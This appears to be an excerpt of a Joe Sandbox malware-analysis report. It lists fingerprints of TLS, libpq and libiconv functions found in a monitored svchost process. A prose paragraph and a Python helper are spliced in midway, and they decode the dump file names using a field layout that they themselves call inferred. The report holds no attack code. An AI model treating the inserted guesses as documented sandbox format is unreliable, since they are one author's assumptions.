                                                                                            • Instruction Fuzzy Hash: 9221B421B0A78282F754DB12E9613AA63D2AF85BC0F1C6431EE4D67B87DF3ED4518714
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_client_cert_type
                                                                                            • API String ID: 0-640112962
                                                                                            • Opcode ID: d99bbee86aef4951533eb8e45d35e470ddafe6d6836048e86d2aa23eb961aa38
                                                                                            • Instruction ID: 2c02425d34ca8a400c1ca7dc279c17062b0af0e8acc59a39abe56a339e0f75ce
                                                                                            • Opcode Fuzzy Hash: d99bbee86aef4951533eb8e45d35e470ddafe6d6836048e86d2aa23eb961aa38
                                                                                            • Instruction Fuzzy Hash: 8F119D21B0D28242F7149722E6653FA12939B467C8F0C2031EE0C5BBC7DE6EE8918218
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug
                                                                                            • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_session_ticket
                                                                                            • API String ID: 193678381-2390203159
                                                                                            • Opcode ID: 3e759472102663428d332e0c0f1ec7d766e9aceebfea9d6430f504463523da80
                                                                                            • Instruction ID: 531cdd0bdd20e95f10f939c95764b3418aaa3825a54853a1fb470c7c4996fa86
                                                                                            • Opcode Fuzzy Hash: 3e759472102663428d332e0c0f1ec7d766e9aceebfea9d6430f504463523da80
                                                                                            • Instruction Fuzzy Hash: 7B11C621F1A04282F790D726E5667BA62A2EF447C4F8C2531EE0C577D7EE2ED9918604
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_post_handshake_auth
                                                                                            • API String ID: 0-2821314493
                                                                                            • Opcode ID: bac7bf4fa3fd4e0730eef9842e57bf5e69d3d4d0274f26ca452d69410104372b
                                                                                            • Instruction ID: 26a67bff637fe4d98d14c600a483240285099b7827d5cf039b2735f0e08fbebd
                                                                                            • Opcode Fuzzy Hash: bac7bf4fa3fd4e0730eef9842e57bf5e69d3d4d0274f26ca452d69410104372b
                                                                                            • Instruction Fuzzy Hash: 3B11C261B1904243F7549722E6A13B923A2AF487C4F4C6431EE0C5BBC7DF2ED8918718
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA3633520: EVP_MD_get0_name.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335A0
                                                                                              • Part of subcall function 00007FFDA3633520: EVP_KDF_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335B8
                                                                                              • Part of subcall function 00007FFDA3633520: ERR_new.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335D4
                                                                                              • Part of subcall function 00007FFDA3633520: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335EC
                                                                                              • Part of subcall function 00007FFDA3633520: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA36335FD
                                                                                              • Part of subcall function 00007FFDA3633520: EVP_KDF_CTX_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFDA364E01B,?,?,?,?,?,?,?), ref: 00007FFDA3633605
                                                                                            • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA36334E4
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA36334FA
                                                                                              • Part of subcall function 00007FFDA3677C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFDA3662254), ref: 00007FFDA3677C3F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$D_get0_nameF_freeR_set_errorR_vset_errorX_free
                                                                                            • String ID: ssl\tls13_enc.c$tls13_hkdf_expand
                                                                                            • API String ID: 3505470307-2272528545
                                                                                            • Opcode ID: fddb73f3f42d1e361181b1abec8d52160b2be2fd5d63a0ca5188853081ea47d7
                                                                                            • Instruction ID: 737b97a63b15de7a64db44deb057e0f2fa3ed5ee9e29ff602ca03426cce5377d
                                                                                            • Opcode Fuzzy Hash: fddb73f3f42d1e361181b1abec8d52160b2be2fd5d63a0ca5188853081ea47d7
                                                                                            • Instruction Fuzzy Hash: AF114232B09BC586E760DB29F49079AB3A5FB88784F145035EA8C93B5ADF3DC545CB04
                                                                                            APIs
                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36EAEFA
                                                                                              • Part of subcall function 00007FFDA36EB5A0: isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB5F6
                                                                                              • Part of subcall function 00007FFDA36EB5A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB612
                                                                                              • Part of subcall function 00007FFDA36EB5A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB669
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fwrite$fputcisprint
                                                                                            • String ID: %d$FunctionCallResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1029667085-1867656554
                                                                                            • Opcode ID: efdbf0a0ab0c98554b995f3597e2318e88cfe4c2bb1ecae12fbd1ed1b6ad4410
                                                                                            • Instruction ID: e19022aa4e6c62186b452ac5dc33cdc5eb13aa977bda9ed9e99d04a26261ff21
                                                                                            • Opcode Fuzzy Hash: efdbf0a0ab0c98554b995f3597e2318e88cfe4c2bb1ecae12fbd1ed1b6ad4410
                                                                                            • Instruction Fuzzy Hash: 55110672B1A24682F600CB15E0616B96352EB807D8F486032EE0E13797CE3EE18AC708
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2E10: GetLastError.KERNEL32(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E24
                                                                                              • Part of subcall function 00007FFDA36E2E10: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E4A
                                                                                            • libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastgetenvlibintl_dgettext
                                                                                            • String ID: libpq-16
                                                                                            • API String ID: 948195521-2857872724
                                                                                            • Opcode ID: 3a66661c28db6f6a59ade8c62b7045bd0313baf9ad75bd288b81f85660766bec
                                                                                            • Instruction ID: 1bc368db807a32a3058b97fa8ac9766c9536f17772078bda3230c67cb325c7bb
                                                                                            • Opcode Fuzzy Hash: 3a66661c28db6f6a59ade8c62b7045bd0313baf9ad75bd288b81f85660766bec
                                                                                            • Instruction Fuzzy Hash: E901A17270AB4286FA00AF10B4102A97362EB44BC4F2C6030EF4D27756CF3DD459C748
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2E10: GetLastError.KERNEL32(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E24
                                                                                              • Part of subcall function 00007FFDA36E2E10: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36E2E4A
                                                                                            • libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastgetenvlibintl_dgettext
                                                                                            • String ID: libpq-16
                                                                                            • API String ID: 948195521-2857872724
                                                                                            • Opcode ID: a9c82ebae72f40f34554ead507a958cf501be2d46aebe87ea8db7c5dc2d6914a
                                                                                            • Instruction ID: 046e0f14d7b17456bc3985a31750a9bdf5ddb6f7382dde6fc793bd07a8cd677e
                                                                                            • Opcode Fuzzy Hash: a9c82ebae72f40f34554ead507a958cf501be2d46aebe87ea8db7c5dc2d6914a
                                                                                            • Instruction Fuzzy Hash: 62018232719B4186E610AF00F4501A9B762FB85BC0F2C5030EF8923756CF3ED455C744
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32 ref: 660165A0
                                                                                            • _strdup.MSVCRT(?,?,?,6600130D), ref: 660165CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleName_strdup
                                                                                            • String ID: c:\windows\system32\libiconv-2.dll
                                                                                            • API String ID: 831641638-1504765582
                                                                                            • Opcode ID: 7026bf7928d83cec5f1dfbb0561090c78347d4f3e1acf3064690492de37efd13
                                                                                            • Instruction ID: 9c0fe357a8a4ab016a03859fd8cde1af2f625d726f15842b17dfc37c7e64cff7
                                                                                            • Opcode Fuzzy Hash: 7026bf7928d83cec5f1dfbb0561090c78347d4f3e1acf3064690492de37efd13
                                                                                            • Instruction Fuzzy Hash: 8201D130A6C61582FB1187E2BC403167AAA7785344F811875C818C6AA5EA3FCBA0C344
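The "Memory Dump Source" lines of the entries above encode, in each dump file name, the process, the dumped region's address, and the region's page protection and type; the Snapshot File line repeats the PID, phase and module base in decimal and lowercase hex. The Python helper below is an added example, not part of the Joe Sandbox report or its tooling: it decodes those names and cross-checks each entry's dump name against its Offset and Snapshot File, so that a reviewer can confirm that every function shown here was lifted from an executable image section of the same process (PID 42, svchost) and catch a mislabelled entry. The field layout (PID, phase, dump id, address, protection, one constant field of unknown meaning, region type, module index) is inferred from this report's own identifiers and is an assumption, as is the meaning of "phase"; the protection and region-type values are the winnt.h constants.

```python
"""Decode Joe Sandbox memory-dump identifiers of the form
<pid>.<phase>.<id>.<address>.<protect>.<?>.<type>.<module>.sdmp as used in the
"Memory Dump Source" entries of this report, and cross-check them against the
entry's Snapshot File and Offset. Field layout inferred from the report (assumption)."""
import re
from dataclasses import dataclass

# Page-protection and region-type constants from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_SDMP = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
    r"(?P<addr>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<unknown>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.(?P<module>[0-9A-F]{8})\.sdmp$"
)
# Snapshot names in this report look like hcaresult_<pid>_<phase>_<module base>_<process>.jbxd.
_SNAP = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<phase>\d+)_(?P<base>[0-9a-f]+)_(?P<proc>.+)\.jbxd$")


@dataclass(frozen=True)
class DumpRegion:
    pid: int            # decimal PID; 0x2A in the names above is PID 42
    phase: int          # assumed: the analysis phase the dump was taken in
    address: int        # start address of the dumped region
    protect: str        # decoded page protection of the region
    mem_type: str       # decoded region type (MEM_IMAGE for a mapped PE)
    module_index: int   # assumed: per-process index of the module


def parse_sdmp(name: str) -> DumpRegion:
    """Split an .sdmp file name into its fields and decode the numeric ones."""
    m = _SDMP.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    protect = int(m["protect"], 16)
    mtype = int(m["mtype"], 16)
    return DumpRegion(
        pid=int(m["pid"], 16),
        phase=int(m["phase"], 16),
        address=int(m["addr"], 16),
        protect=PAGE_PROTECT.get(protect, f"0x{protect:X}"),
        mem_type=MEM_TYPE.get(mtype, f"0x{mtype:X}"),
        module_index=int(m["module"], 16),
    )


def parse_snapshot(name: str):
    """Return (pid, phase, module base, process name) from a .jbxd snapshot name."""
    m = _SNAP.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox snapshot name: {name!r}")
    return int(m["pid"]), int(m["phase"]), int(m["base"], 16), m["proc"]


def region_matches_snapshot(sdmp_name: str, offset_hex: str, snapshot_name: str) -> bool:
    """Consistency check for one entry: the dump's PID and phase must equal the
    snapshot's, the entry's Offset must equal the snapshot's module base, and the
    dumped region must start at or above that base."""
    region = parse_sdmp(sdmp_name)
    pid, phase, base, _proc = parse_snapshot(snapshot_name)
    return (region.pid, region.phase) == (pid, phase) \
        and int(offset_hex, 16) == base and region.address >= base


def executable_image_regions(names):
    """Keep only executable MEM_IMAGE regions, i.e. the code sections a
    disassembled function can actually have been lifted from."""
    return [r for r in map(parse_sdmp, names)
            if r.mem_type == "MEM_IMAGE" and r.protect.startswith("PAGE_EXECUTE")]


# (sdmp name, Offset, Snapshot File) triples copied from three entries above.
SAMPLE_ENTRIES = [
    ("0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp",
     "00007FFDA36D0000", "hcaresult_42_2_7ffda36d0000_svchost.jbxd"),
    ("0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp",
     "00007FFDA3600000", "hcaresult_42_2_7ffda3600000_svchost.jbxd"),
    ("0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp",
     "66000000", "hcaresult_42_2_66000000_svchost.jbxd"),
]

if __name__ == "__main__":
    for sdmp, offset, snap in SAMPLE_ENTRIES:
        r = parse_sdmp(sdmp)
        print(f"pid={r.pid} phase={r.phase} module={r.module_index} {r.address:#x} "
              f"{r.protect} {r.mem_type} consistent={region_matches_snapshot(sdmp, offset, snap)}")
```

Run as a script, the three sample entries decode to PID 42, phase 2, executable MEM_IMAGE regions at 0x7ffda36d1000, 0x7ffda3601000 and 0x66001000, and each passes the cross-check; the associated (non-source) dumps of the same modules decode to PAGE_READONLY, PAGE_READWRITE and PAGE_WRITECOPY regions, which is why they are not listed as a function's source.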
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: %d$Authentication$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3645302600
                                                                                            • Opcode ID: 65b55df67341c2a45037abb1bca6d99a94d1ae5a68168e52fdb9a211edd1527c
                                                                                            • Instruction ID: 37ffcdde2a4d5e09f43830c8be1d682c3464bfea1ff73a40f1eb0fe501650835
                                                                                            • Opcode Fuzzy Hash: 65b55df67341c2a45037abb1bca6d99a94d1ae5a68168e52fdb9a211edd1527c
                                                                                            • Instruction Fuzzy Hash: E1018F6271B68686FA50D715E161BB92322EB447D8F482032DE0E17747CE7EE58AC748
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36E8C80: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36E9D72), ref: 00007FFDA36E8C91
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36E8393
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36E83CC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastfreelibintl_dgettextmalloc
                                                                                            • String ID: SSL error: %s$out of memory allocating error description
                                                                                            • API String ID: 1502961081-4093627138
                                                                                            • Opcode ID: e3d34bd05711348f7b805d04645ebf8f4f40213b9870b51db00fec4438ff1202
                                                                                            • Instruction ID: 83ee0ce886f3beae854633903e92dd346b22a1f0fc75e19d1f881b36620e1229
                                                                                            • Opcode Fuzzy Hash: e3d34bd05711348f7b805d04645ebf8f4f40213b9870b51db00fec4438ff1202
                                                                                            • Instruction Fuzzy Hash: ABF05452B0BA0241FD11A765B4352B952432F45BB1F5C1335DD3D1A3D7DE3DE4858358
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36E8C80: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36E9D72), ref: 00007FFDA36E8C91
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36E8590
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36E85C9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastfreelibintl_dgettextmalloc
                                                                                            • String ID: SSL error: %s$out of memory allocating error description
                                                                                            • API String ID: 1502961081-4093627138
                                                                                            • Opcode ID: 7d64dc923ddbdbb8918f8f8ded1c80ffeac5535c1bbff89e7c97c654edb7c8c5
                                                                                            • Instruction ID: b3056907bf4b0cf94d4c441970b0528829fae09b2788a69b5a005803e6c00f9c
                                                                                            • Opcode Fuzzy Hash: 7d64dc923ddbdbb8918f8f8ded1c80ffeac5535c1bbff89e7c97c654edb7c8c5
                                                                                            • Instruction Fuzzy Hash: B6F05E21B0BA4241FD11AB65E4752F962526F49FB0F9C2334DA2E2B3D3DE2DE4458358
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: b8b85842ba8dcd65b29ae0c9a608aaecfd78d6fd32637d9c73b25371dd4363bf
                                                                                            • Instruction ID: 059b60f5c306b3ec1a7697dc440631c93e9364c906ed9c67494933d25160bc29
                                                                                            • Opcode Fuzzy Hash: b8b85842ba8dcd65b29ae0c9a608aaecfd78d6fd32637d9c73b25371dd4363bf
                                                                                            • Instruction Fuzzy Hash: 72414D33707B8196EA108F21E86036963A5FB48F94F0C1936DE4D1B766DF39E4A4C714
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
